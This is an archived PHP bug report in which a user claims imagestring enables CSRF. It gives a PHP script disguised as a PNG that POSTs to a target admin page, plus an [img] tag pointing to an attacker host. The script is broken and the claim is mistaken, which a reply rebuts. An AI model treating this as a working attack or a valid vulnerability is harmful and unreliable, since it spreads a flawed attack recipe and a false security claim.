|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
[2009-04-09 21:10 UTC] elmasterlow at gmail dot com
Description:
------------
With this vulnerability we could do any function in php on image.
In this case the vulnerability can be used to do a CSRF attack.
We can insert the img in BB tags at random forum for example.
I think there is any possible way to make a js code...
Reproduce code:
---------------
<?
header('Content-Type: image/png');
$img = 'obrazek.png';
$data = array ('foo' => 'bar', 'foo2' => 'bar2');
$data = http_build_query($data);
$context_options = array ('http' => array(
'method' => 'POST',
'header'=> "Content-type: application/x-www-form-urlencoded\r\n"."Content-Length: ".strlen($data)."\r\n",
'content' => $data
));
$context = stream_context_create($context_options);
$fp = fopen('http://example.com/admin.php', 'r', false, $context);
imagestring($im, 1, 5, 5, fpassthru($fp) . $img, $tc);
imagepng($im);
imagedestroy($im);
?>
Expected result:
----------------
Insert [img]http://attacker/image.php[/img] on target site to do any function in image.
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
|
|||||||||||||||||||||||||||||||||
Copyright © 2001-2025 The PHP GroupAll rights reserved. |
Last updated: Sun Dec 14 19:00:01 2025 UTC |
Why is it a imagestring problem? You can build attacks using php or any other languages. imagestring will simply draw a text using the number of characters sent by fpassthru, which will be executed before imagestring. That's the same as doing: header('Content-Type: image/png'); fpassthru($fp); // create an image, draw something, sent it // ... imagepng($im);